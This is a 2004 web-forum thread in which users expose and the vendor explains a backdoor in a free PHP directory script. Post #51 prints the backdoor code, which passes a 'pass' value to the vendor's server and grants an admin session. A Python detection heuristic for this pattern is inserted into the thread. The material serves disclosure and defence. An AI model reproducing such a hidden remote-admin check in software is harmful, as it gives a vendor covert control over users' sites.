| Web Directory Issues Yahoo!, DMOZ, LookSmart, ETC. |
09-07-2004, 10:20 AM
|
#41 (permalink)
|
|
Inactive
Join Date: 09-07-04
Posts: 2
Latest Blog: None
|
just wanted to interject here for a sec.
I've been a PHP developer for a long time and I can understand the wanting to track where your software is installed, and tracking for valid licenses.
With my free stuff, I just use a blank image usually to tell me where it's installed, but with my commercial software, I sometimes generate a key for the web site where it's gonna be installed and when the software checks that key with the site it's installed on, it gets to decide on whether it's licensed to be there or not. Unlicensed software will email me to say that the script's been installed someplace where it shouldn't be.
I've never needed backdoors but I know people who use them. In fact, you'd be surprised how many scripts use backdoors or license tracking.
|
|
|
09-07-2004, 10:38 AM
|
#42 (permalink)
|
|
Inactive
Join Date: 10-26-03
Posts: 2,466
Latest Blog: None
|
Quote:
|
Originally Posted by stoner3221
I paid what I considered big bucks for a script that had very poor cross browser compatibility and have spent over a $1,000 dollars to make it so and it’s still not right.
|
I'm curious by what you mean that it has compatibility. Seems to work fine in IE and Firefox, which is possibly 99% of users.
|
|
|
09-07-2004, 10:41 AM
|
#43 (permalink)
|
|
Individualist
Join Date: 09-27-03
Location: Japan, mostly
Posts: 42,521
|
Some people are saying he gets people's passwords, but he denies that. Which is it?
|
|
|
09-07-2004, 10:48 AM
|
#44 (permalink)
|
|
No Longer Here
Join Date: 09-27-03
Location: State College, PA
Posts: 9,354
Latest Blog: None
|
Quote:
|
Originally Posted by I, Brian
I'm curious by what you mean that it has compatibility. Seems to work fine in IE and Firefox, which is possibly 99% of users.
|
I think he may be talking about the issue with the doctype being wrong on some of the pages, which causes problems on those pages in Firefox.
|
|
|
09-07-2004, 12:04 PM
|
#45 (permalink)
|
|
Inactive
Join Date: 09-02-04
Location: Germany
Posts: 18
Latest Blog: None
|
Quote:
|
Some people are saying he gets people's passwords, but he denies that. Which is it?
|
Take a look at the free version you could download: include.php, line 60, then scroll to the right and analyze the code ;-)
Perhaps he made some changes now, after this thread;
Greets
|
|
|
09-07-2004, 12:41 PM
|
#46 (permalink)
|
|
Inactive
Join Date: 05-05-04
Location: america
Posts: 653
Latest Blog: None
|
How much would a programmer charge if he created a directory program just for me with same features (no need for backup, downloadability.., everything to be done manually).
Why not create a phpbb forum, do a good modrewrite, remove header and footer. I guess the result would almost be the same.
|
|
|
09-07-2004, 02:29 PM
|
#47 (permalink)
|
|
v7n Mentor
Join Date: 01-25-04
Location: South Glens Falls, NY
Posts: 407
|
Quote:
|
Originally Posted by I, Brian
I'm curious by what you mean that it has compatibility. Seems to work fine in IE and Firefox, which is possibly 99% of users.
|
I tried it myself in Firefox last week, it was viewable but the formatting was all off, probably not noticeable to most users. I used to get a major amount of complaints but have most of the issues resolved except Firefox. I hope!
|
|
|
09-07-2004, 07:46 PM
|
#48 (permalink)
|
|
v7n Mentor
Join Date: 02-18-04
Location: We Are Penn State!
Posts: 3,554
Latest Blog: None
|
Quote:
|
Originally Posted by realestate
How much would a programmer charge if he created a directory program just for me with same features (no need for backup, downloadability.., everything to be done manually).
|
depends on the programmer, their skill, their cost of living, and what they think they are worth
|
|
|
09-08-2004, 01:35 AM
|
#49 (permalink)
|
|
Junior Member
Join Date: 09-08-04
Posts: 23
Latest Blog: None
|
Hi folks.
Looks like the script has been modified, and the back door removed.
Initial risks were:
1. Author could access via remote auth (true state from remote script would setup admin session)
2. Install called gifs from server for installation tracking << this may still be present, but it's not a risk.
PS: It should be noted that the script was never set up to capture passwords. ONLY in the event that a specific arg was passed (via URL) would the script query his server (ie he had to have configured his script to return 'true' in response to the query.)
Anyhow, my point is, if the crap has been removed, then the script can be used - and to be honest it's a damn good one. The catch 22 was, you couldn't remove the back door because it would contravene the licensing agreement (ie no code mods). I must say I encountered a few annoyed WM's who weren't trying to abuse anything - instead, they felt abused (viewed the nondisclosure as deliberate deception by omission.)
Anyhow, the script is looking good. If I needed one, I'd prolly use it myself.
Cheers,
JL.
Last edited by John_Loch : 09-08-2004 at 01:41 AM.
|
|
|
09-08-2004, 04:56 AM
|
#50 (permalink)
|
|
Inactive
Join Date: 10-26-03
Posts: 2,466
Latest Blog: None
|
Quote:
|
Originally Posted by stoner3221
I tried it myself in Firefox last week, it was viewable but the formatting was all off, probably not noticeable to most users. I used to get a major amount of complaints but have most of the issues resolved except Firefox. I hope!
|
Do you mean the way that IE shows the categories different to Firefox?
If so I wouldn't at all have regarded it as a big issue. (shrugs)
Is Doctype the source of this, then?
|
|
|
09-08-2004, 12:22 PM
|
#51 (permalink)
|
|
Inactive
Join Date: 09-07-04
Posts: 2
Latest Blog: None
|
I noticed when I downloaded his most recent update yesterday that it had been removed.
At the same time, looking at an earlier version that I had, you can see that he doesn't get your password, he sends it a password that checks to see if it's the same one he has on his server and if it is then it lets him access the admin panel:
Code:
if ($pass) {
    // Ask the vendor's server whether the supplied "pass" value is accepted
    $access = fopen ("http://www.directory-search.org/include_variables.php?p=$pass","r");
    $access = fread($access,4);
    // A 4-byte reply of "true" starts an admin session
    if ($access == "true"){
        session_start();
        $HTTP_SESSION_VARS['admin'] = true;
        header("Location: {$dir}admin_edit.php");
    };
    // As posted, $access is assigned "true" before this second check
    $access = "true";
    if ($access == "true"){
        session_start();
        $HTTP_SESSION_VARS['admin'] = true;
        header("Location: {$dir}admin_edit.php");
    }
};
There is no grabbing of your password and firing it off to their web server for record keeping.
Pretty standard back door actually, most back doors have a hidden key that a programmer can use. It's what they were built for, now some use them for license tracking.
Just he made his more noticeable.
|
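The remote-auth pattern described in posts #49 and #51 (a remote fetch carrying a request variable, followed by a session admin flag being set) is something an installer can look for when auditing third-party PHP. The Python heuristic below is an added example, not part of the thread or of the script discussed; the function name, the line window and both PHP samples (with a placeholder host) are constructed for illustration.

```python
import re

# A PHP call that fetches an http(s) URL with a variable interpolated into it,
# e.g. fopen("http://host/x.php?p=$pass", "r"). Needs allow_url_fopen enabled.
REMOTE_OPEN = re.compile(
    r"""\b(?:fopen|file_get_contents|file|readfile)\s*\(\s*["']https?://[^"']*\$\w+""",
    re.IGNORECASE)
# A session write that sets a flag to true/1 (not a == comparison).
SESSION_GRANT = re.compile(
    r"""\$(?:HTTP_SESSION_VARS|_SESSION)\s*\[\s*["']?(\w+)["']?\s*\]\s*=\s*(?:true|1)\b""",
    re.IGNORECASE)

def find_remote_auth(php_source, window=8):
    """Return (fetch_line, grant_line, session_key) for every remote fetch
    followed within `window` lines by a session flag being set."""
    lines = php_source.splitlines()
    findings = []
    for i, line in enumerate(lines):
        if not REMOTE_OPEN.search(line):
            continue
        for j in range(i + 1, min(i + 1 + window, len(lines))):
            grant = SESSION_GRANT.search(lines[j])
            if grant:
                findings.append((i + 1, j + 1, grant.group(1)))
                break
    return findings

# Constructed sample modelled on the posted snippet; the host is a placeholder.
SUSPECT = '''<?php
if ($pass) {
$access = fopen ("http://vendor.example.invalid/check.php?p=$pass","r");
$access = fread($access,4);
if ($access == "true"){
session_start();
$HTTP_SESSION_VARS['admin'] = true;
header("Location: {$dir}admin_edit.php");
}
}
'''
# Constructed benign sample: local file read and a local credential check.
BENIGN = '''<?php
$fh = fopen("config/settings.ini", "r");
if (password_ok($user, $pass)) {
session_start();
$_SESSION['admin'] = true;
}
'''

if __name__ == "__main__":
    for fetch, grant, key in find_remote_auth(SUSPECT):
        print(f"remote fetch on line {fetch} gates session '{key}' set on line {grant}")
```

This is a line-proximity heuristic for readable source; encoded or obfuscated code needs decoding first, and setting `allow_url_fopen = Off` in php.ini stops `fopen()` from reaching remote URLs at all.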
|
|
09-08-2004, 02:44 PM
|
#52 (permalink)
|
|
v7n Mentor
Join Date: 01-25-04
Location: South Glens Falls, NY
Posts: 407
|
Quote:
|
Originally Posted by I, Brian
Do you mean the way that IE shows the categories different to Firefox?
If so I wouldn't at all have regarded it as a big issue. (shrugs)
Is Doctype the source of this, then?
|
It’s not high on my priority list but to me it is still an issue since it looks very bad in Firefox in my opinion. At one time it was barely viewable in Firefox but thanks to some wonderful help from here was corrected.
|
|
|
09-09-2004, 07:58 AM
|
#53 (permalink)
|
|
Inactive
Join Date: 09-09-04
Posts: 1
Latest Blog: None
|
Hello,
I am Javier García, co-owner of Biz-Directory.org and programmer of the Free PHP Directory Script. Let me explain the things people are talking about.
First of all, we have removed the code the article talks about, we prefer not to have annoyed customers though we have to bear abuses from other people.
The invisible image was just that, an image, unable to hurt in any way. It allowed us to keep the records of installed scripts. It was more convenient than requesting the installation url every time the script was downloaded/installed.
Regarding the backdoor, it was password-protected, so it is impossible for anybody but us to access the script, not even people with access to the script code. We added this feature several months after the first distribution of the script. We had several problems with abusive users, not only removing copyright links but also reselling the script, besides other aggressive actions. So we decided to include this tool. We have only used it once, and its use was more than justified. As the full script is distributed after the purchase, and there is no risk, it does not include this code.
Something people are wrong about: the backdoor was not sending any personal data, of course not the password, nor other user information. The only parameter sent was the "pass" variable, not used in the script (not even in the installation, in addition the installation does not include "include.php" but "include_install.php"). It was the variable we should type in the querystring to enter the panel. Any programmer can tell this looking at the code.
Maybe including this code was not a lucky idea, but our intention was not to retrieve personal information. Just to allow us an entrance in case of abuse.
We are sorry about any inconvenience this could have caused, but we can assure no legal user of the script has anything to be afraid of.
Regards
Javier García
Biz Directory
|
|
|
09-10-2004, 06:52 AM
|
#54 (permalink)
|
|
Individualist
Join Date: 09-27-03
Location: Japan, mostly
Posts: 42,521
|
Welcome to the forum, Javier.

|
|
|
09-11-2004, 03:45 AM
|
#55 (permalink)
|
|
Inactive
Join Date: 10-13-03
Location: Lebanon
Posts: 4,099
Latest Blog: None
|
welcome, and thanks for the clear explanation
|
|
|
09-11-2004, 05:13 AM
|
#56 (permalink)
|
|
Inactive
Join Date: 10-26-03
Posts: 2,466
Latest Blog: None
|
Having already paid for a $50 licence, and about to buy a $700 licence, I'm pretty fine with it all. (Shrugs.)
|
|
|
09-11-2004, 10:41 AM
|
#57 (permalink)
|
|
Inactive
Join Date: 10-13-03
Location: Lebanon
Posts: 4,099
Latest Blog: None
|
yes, one of the best scripts ..
|
|
|
|
All times are GMT -7. The time now is 11:13 PM.
© Copyright 2008 V7 Inc
|